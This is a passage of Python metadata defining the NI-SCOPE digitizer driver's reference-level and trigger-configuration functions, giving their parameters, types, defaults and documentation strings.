'description': '\nIndicates whether the digitizer enforces real-time measurements or\nallows equivalent-time (RIS) measurements; not all digitizers support\nRIS—refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n\nDefault value: VI_TRUE\n\n**Defined Values**\n\nVI_TRUE—Allow real-time acquisitions only\n\nVI_FALSE—Allow real-time and equivalent-time acquisitions\n'
},
'name': 'enforceRealtime',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'ConfigureRefLevels': {
'codegen_method': 'private',
'documentation': {
'description': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the reference levels for all channels of the digitizer. The\nlevels may be set on a per channel basis by setting\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL\n\nThis function configures the reference levels for waveform measurements.\nCall this function before calling niScope_FetchMeasurement to take a\nrise time, fall time, width negative, width positive, duty cycle\nnegative, or duty cycle positive measurement.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'default_value': 10.0,
'direction': 'in',
'documentation': {
'description': '\nPass the low reference you want the digitizer to use for waveform\nmeasurements.\n\nUnits: Either a percentage or voltage based on\nNISCOPE_ATTR_MEAS_REF_LEVEL_UNITS. A percentage is calculated with\nthe voltage low and voltage high measurements representing 0% and 100%,\nrespectively.\n\nDefault Value: 10.0\n'
},
'name': 'low',
'type': 'ViReal64'
},
{
'default_value': 50.0,
'direction': 'in',
'documentation': {
'description': '\nPass the mid reference you want the digitizer to use for waveform\nmeasurements.\n\nUnits: Either a percentage or voltage based on\nNISCOPE_ATTR_MEAS_REF_LEVEL_UNITS. A percentage is calculated with\nthe voltage low and voltage high measurements representing 0% and 100%,\nrespectively.\n\nDefault Value: 50.0\n'
},
'name': 'mid',
'type': 'ViReal64'
},
{
'default_value': 90.0,
'direction': 'in',
'documentation': {
'description': '\nPass the high reference you want the digitizer to use for waveform\nmeasurements.\n\nUnits: Either a percentage or voltage based on\nNISCOPE_ATTR_MEAS_REF_LEVEL_UNITS. A percentage is calculated with\nthe voltage low and voltage high measurements representing 0% and 100%,\nrespectively.\n\nDefault Value: 90.0\n'
},
'name': 'high',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTrigger': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the common attributes of the trigger subsystem.\n\nWhen you use niScope_ReadWaveform, the instrument waits for a trigger.\nYou specify the type of trigger for which the instrument waits with the\nTrigger Type parameter.\n\nIf the instrument requires multiple waveform acquisitions to build a\ncomplete waveform, it waits for the length of time you specify with the\n**holdoff** parameter to elapse since the previous trigger. The\ninstrument then waits for the next trigger.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the type of trigger for which the digitizer will wait.'
},
'name': 'triggerType',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerCoupling': {
'codegen_method': 'no',
'documentation': {
'description': 'Sets the trigger coupling attribute.',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify how you want the instrument to couple the trigger signal.\n\nDefined Values\n\n NISCOPE_VAL_AC (0)\n\n NISCOPE_VAL_DC (1)\n\nNISCOPE_VAL_HF_REJECT (2)\n\nNISCOPE_VAL_LF_REJECT (3)\n\nNISCOPE_VAL_AC_PLUS_HF_REJECT (1001)\n'
},
'name': 'coupling',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerDigital': {
'documentation': {
'description': '\nConfigures the common properties of a digital trigger.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nFor multirecord acquisitions, all records after the first record are\nstarted by using the Advance Trigger Source. The default is immediate.\n\nYou can adjust the amount of pre-trigger and post-trigger samples using\nthe reference position parameter on the\nniScope_ConfigureHorizontalTiming function. The default is half of the\nrecord length.\n\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n\nDigital triggering is not supported in RIS mode.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'default_value': 'TriggerSlope.POSITIVE',
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'enum': 'TriggerSlope',
'name': 'slope',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerEdge': {
'documentation': {
'description': '\nConfigures common properties for analog edge triggering.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'level',
'type': 'ViReal64'
},
{
'default_value': 'TriggerSlope.POSITIVE',
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'enum': 'TriggerSlope',
'name': 'slope',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerGlitch': {
'codegen_method': 'no',
'documentation': {
'description': 'Configures common properties for glitch triggering.\n\nA glitch trigger occurs when a pulse that crosses a vertical threshold you specify and with a polarity you specify also has a width that is either greater than or less than a duration you specify.',
'note': '\nSome features are not supported by all digitizers.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE for defined values.'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The voltage threshold for the trigger. Refer to NISCOPE_ATTR_TRIGGER_LEVEL for more information.'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nglitchWidth specifies, in seconds, the glitch duration to be used in combination with the **glitch condition** that triggers the oscilloscope.\n\nThe oscilloscope triggers when it detects a pulse of duration either less than or greater than this value depending on the value of the NISCOPE_ATTR_GLITCH_CONDITION.\nRefer to the NISCOPE_ATTR_GLITCH_WIDTH property for more information.\n'
},
'name': 'width',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the pulses that trigger the oscilloscope for glitch triggering. Refer to the NISCOPE_ATTR_GLITCH_POLARITY attribute for defined values.'
},
'enum': 'GlitchPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies whether the oscilloscope triggers on pulses of duration less than or greater than the specified NISCOPE_ATTR_GLITCH_WIDTH. Refer to the NISCOPE_ATTR_GLITCH_CONDITION attribute for defined values.'
},
'enum': 'GlitchCondition',
'name': 'glitchCondition',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Applies coupling and filtering options to the trigger signal. Refer to NISCOPE_ATTR_TRIGGER_COUPLING for more information.'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'The length of time the digitizer waits after detecting a trigger before enabling NI-SCOPE to detect another trigger. Refer to NISCOPE_ATTR_TRIGGER_HOLDOFF for more information.'
},
'name': 'holdoff',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'How long the digitizer waits after receiving the trigger to start acquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more information.'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerHysteresis': {
'documentation': {
'description': '\nConfigures common properties for analog hysteresis triggering. This kind\nof trigger specifies an additional value, specified in the\n**hysteresis** parameter, that a signal must pass through before a\ntrigger can occur. This additional value acts as a kind of buffer zone\nthat keeps noise from triggering an acquisition.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the\nNISCOPE_ATTR_ACQ_ARM_SOURCE. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe size of the hysteresis window on either side of the **level** in\nvolts; the digitizer triggers when the trigger signal passes through the\nhysteresis value you specify with this parameter, has the slope you\nspecify with **slope**, and passes through the **level**. Refer to\nNISCOPE_ATTR_TRIGGER_HYSTERESIS for defined values.\n'
},
'name': 'hysteresis',
'type': 'ViReal64'
},
{
'default_value': 'TriggerSlope.POSITIVE',
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'enum': 'TriggerSlope',
'name': 'slope',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerImmediate': {
'documentation': {
'description': '\nConfigures common properties for immediate triggering. Immediate\ntriggering means the digitizer triggers itself.\n\nWhen you initiate an acquisition, the digitizer waits for a trigger. You\nspecify the type of trigger that the digitizer waits for with a\nConfigure Trigger function, such as niScope_ConfigureTriggerImmediate.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerOutput': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the digitizer to generate a signal pulse that other\ndigitizers can detect when configured for digital triggering.\n\nFor Traditional NI-DAQ devices, exported signals are still present in\nthe route after the session is closed. You must clear the route before\nclosing the session, or call niScope_reset.\n\nTo clear the route, call this function again and route\nNISCOPE_VAL_NONE to the line that you had exported. For example, if\nyou originally called this function with the trigger event\nNISCOPE_VAL_STOP_TRIGGER_EVENT routed to the trigger output\nNISCOPE_VAL_RTSI_0, you would call this function again with\nNISCOPE_VAL_NONE routed to NISCOPE_VAL_RTSI_0 to clear the route.\n',
'note': '\nThis function is obsolete. Consider using niScope_ExportSignal\ninstead.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the condition in which this device generates a digital pulse.'
},
'name': 'triggerEvent',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the hardware signal line on which the digital pulse is\ngenerated.\n\n**Valid Values**\n\n| NISCOPE_VAL_NO_EVENT\n| NISCOPE_VAL_STOP_TRIGGER_EVENT\n| NISCOPE_VAL_START_TRIGGER_EVENT\n| NISCOPE_VAL_END_OF_ACQUISITION_EVENT\n| NISCOPE_VAL_END_OF_RECORD_EVENT\n'
},
'name': 'triggerOutput',
'type': 'ViString'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerRunt': {
'codegen_method': 'no',
'documentation': {
'description': 'Configures common properties for runt triggering.\n\nA runt trigger occurs when both the leading edge and trailing edge of a pulse cross only one of two trigger thresholds you specify and with a polarity you specify, where the polarity is relative to the threshold crossed.',
'note': '\nSome features are not supported by all digitizers.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a particular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE for defined values.'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in volts, the higher of two thresholds that bound the vertical range to examine for runt pulses. Refer to the NISCOPE_ATTR_RUNT_HIGH_THRESHOLD attribute for more information.'
},
'name': 'lowThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in volts, the lower of two thresholds that bound the vertical range to examine for runt pulses. Refer to the NISCOPE_ATTR_RUNT_LOW_THRESHOLD attribute for more information.'
},
'name': 'highThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the runt pulses, relative to the runt threshold the pulses cross, that trigger the oscilloscope for runt triggering. Refer to the NISCOPE_ATTR_RUNT_POLARITY attribute for defined values.'
},
'enum': 'RuntPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Applies coupling and filtering options to the trigger signal. Refer to NISCOPE_ATTR_TRIGGER_COUPLING for more information.'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'The length of time the digitizer waits after detecting a trigger before enabling NI-SCOPE to detect another trigger. Refer to NISCOPE_ATTR_TRIGGER_HOLDOFF for more information.'
},
'name': 'holdoff',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'How long the digitizer waits after receiving the trigger to start acquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more information.'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerSoftware': {
'documentation': {
'description': '\nConfigures common properties for software triggering.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n\nTo trigger the acquisition, use niScope_SendSoftwareTriggerEdge.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerVideo': {
'documentation': {
'description': '\nConfigures the common properties for video triggering, including the\nsignal format, TV event, line number, polarity, and enable DC restore. A\nvideo trigger occurs when the digitizer finds a valid video signal sync.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'default_value': False,
'direction': 'in',
'documentation': {
'description': '\nOffsets each video line so the clamping level (the portion of the video\nline between the end of the color burst and the beginning of the active\nimage) is moved to zero volt. Refer to\nNISCOPE_ATTR_ENABLE_DC_RESTORE for defined values.\n'
},
'name': 'enableDcRestore',
'type': 'ViBoolean'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the type of video signal sync the digitizer should look for.\nRefer to NISCOPE_ATTR_TV_TRIGGER_SIGNAL_FORMAT for more\ninformation.\n'
},
'enum': 'VideoSignalFormat',
'name': 'signalFormat',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the TV event you want to trigger on. You can trigger on a\nspecific or on the next coming line or field of the signal.\n'
},
'enum': 'VideoTriggerEvent',
'name': 'event',
'type': 'ViInt32'
},
{
'default_value': 1,
'direction': 'in',
'documentation': {
'description': '\nSelects the line number to trigger on. The line number range covers an\nentire frame and is referenced as shown on `Vertical Blanking and\nSynchronization\nSignal <REPLACE_DRIVER_SPECIFIC_URL_1(gray_scale_image)>`__. Refer to\nNISCOPE_ATTR_TV_TRIGGER_LINE_NUMBER for more information.\n\nDefault value: 1\n'
},
'name': 'lineNumber',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the video signal sync.'
},
'enum': 'VideoPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerWidth': {
'codegen_method': 'no',
'documentation': {
'description': '',
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE for defined values.'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The voltage threshold for the trigger. Refer to NISCOPE_ATTR_TRIGGER_LEVEL for more information.'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in seconds, the lower bound on the range of pulse durations that triggers the oscilloscope. Refer to the NISCOPE_ATTR_WIDTH_LOW_THRESHOLD attribute for defined values.'
},
'name': 'lowThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies, in seconds, the upper bound on the range of pulse durations that triggers the oscilloscope. Refer to the NISCOPE_ATTR_WIDTH_HIGH_THRESHOLD attribute for defined values.'
},
'name': 'highThreshold',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the polarity of the pulses that trigger the oscilloscope for width triggering. Refer to the NISCOPE_ATTR_WIDTH_POLARITY attribute for defined values.'
},
'enum': 'WidthPolarity',
'name': 'polarity',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies whether the oscilloscope triggers on pulses of duration within or outside the range of pulse durations bounded by **Low Threshold** and **High Threshold**. Refer to the NISCOPE_ATTR_WIDTH_CONDITION attribute for defined values.'
},
'enum': 'WidthCondition',
'name': 'condition',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'Applies coupling and filtering options to the trigger signal. Refer to NISCOPE_ATTR_TRIGGER_COUPLING for more information.'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': 'The length of time the digitizer waits after detecting a trigger before enabling NI-SCOPE to detect another trigger. Refer to NISCOPE_ATTR_TRIGGER_HOLDOFF for more information.'
},
'name': 'holdoff',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'How long the digitizer waits after receiving the trigger to start acquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more information.'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerWindow': {
'documentation': {
'description': '\nConfigures common properties for analog window triggering. A window\ntrigger occurs when a signal enters or leaves a window you specify with\nthe **high level** or **low level** parameters.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n\nTo trigger the acquisition, use niScope_SendSoftwareTriggerEdge.\n',
'note': 'Some features are not supported by all digitizers.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the voltage threshold you want the digitizer to use for low\ntriggering.\n'
},
